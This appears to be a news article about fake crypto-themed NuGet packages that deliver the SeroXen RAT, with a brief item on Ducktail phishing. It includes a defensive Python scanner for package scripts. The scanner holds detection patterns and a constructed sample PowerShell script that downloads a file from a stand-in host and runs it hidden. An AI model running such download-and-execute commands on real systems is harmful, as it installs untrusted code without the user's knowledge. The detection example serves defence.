Crypto-Themed Malware Infiltrates NuGet Server

As hackers launch new scams, malicious packages impersonating Kraken, Solana, and Monero have inundated the NuGet server.

NuGet, a package manager used for packaging and distributing .NET-based software, appears to be a target for malicious actors who impersonate crypto-related packages to exploit vulnerabilities.

Six malicious packages downloaded by a user going by the name “Disti” pose as Kraken, Solana, KuCoin, and Monero libraries and wrappers, according to the first report from Phylum researchers.

According to reports, the bad actor also attempted to bolster his credibility by forging download statistics.

NuGet’s repository of Disti | Source: Phylum

Once installed on a victim’s computer, the malware executes .cmd and .bat files using two PowerShell scripts. The scripts attempt to remain unnoticed by not producing visible output or errors, and they eventually download an external file.

Following a lengthy sequence of manipulations, the script downloads the SeroXen RAT. This stealthy remote access trojan gained popularity alongside video game cheats for Call of Duty: Warzone and Fortnite.

The trojan is well-known among cybercriminals because it grants complete access to a victim’s computer with minimal detection. According to BleepingComputer, the malware remains on NuGet’s server.
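
As an added example (not code from Phylum's report or from this article), the following Python shows how a defender could triage a .nupkg before installing it: it reads the scripts bundled in the package and flags the behaviours described above, namely downloading an external file, launching .cmd or .bat files, and hiding output or errors. The regular expressions, function names and sample scripts are assumptions constructed for illustration.

```python
import io
import re
import zipfile

# Heuristics for the three behaviours the article describes (patterns are assumptions).
INDICATORS = {
    "downloads_external_file": re.compile(
        r"Invoke-WebRequest|Start-BitsTransfer|DownloadFile|DownloadString|\b(iwr|curl)\b", re.I),
    "runs_cmd_or_bat": re.compile(r"\S+\.(cmd|bat)\b", re.I),
    "hides_output_or_errors": re.compile(
        r"-WindowStyle\s+Hidden|SilentlyContinue|Out-Null|2>\s*\$null|>\s*nul\b", re.I),
}
SCRIPT_EXT = (".ps1", ".psm1", ".cmd", ".bat")

def decode_script(raw: bytes) -> str:
    """PowerShell files are often UTF-16 with a BOM; otherwise assume UTF-8."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")

def scan_nupkg(data: bytes) -> dict:
    """Map each script inside a .nupkg (a ZIP archive) to the indicators it matches."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            if name.lower().endswith(SCRIPT_EXT):
                text = decode_script(pkg.read(name))
                hits = sorted(k for k, rx in INDICATORS.items() if rx.search(text))
                if hits:
                    findings[name] = hits
    return findings

def needs_review(findings: dict) -> bool:
    """Escalate when a single script both fetches a file and hides its output."""
    wanted = {"downloads_external_file", "hides_output_or_errors"}
    return any(wanted <= set(hits) for hits in findings.values())

def make_sample(script: str, encoding: str = "utf-8") -> bytes:
    """Build a constructed in-memory .nupkg for the demo; no disk or network access."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("tools/init.ps1", script.encode(encoding))
    return buf.getvalue()

# Constructed sample scripts (not taken from the real packages).
SUSPICIOUS = ("$ErrorActionPreference = 'SilentlyContinue'\n"
              "Invoke-WebRequest 'https://example.invalid/f' -OutFile \"$env:TEMP\\f.cmd\"\n"
              "Start-Process \"$env:TEMP\\f.cmd\" -WindowStyle Hidden\n")
BENIGN = "Write-Host 'Thanks for installing Sample'\n"
```

A match is a prompt for manual review rather than a verdict, since a script that obfuscates its commands will not match these patterns.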

According to previous reports, a new variant of the Ducktail phishing campaign spreads PHP malware that can access and steal Facebook accounts, browsing data, and even cryptocurrency wallets.

According to reports, the attackers use social engineering techniques and seek victims on LinkedIn, a professional networking website.

The malicious software is spread as an archive containing images, videos, and documents. After the file is downloaded and opened, browser cookies are read and sent to the hacker’s server.
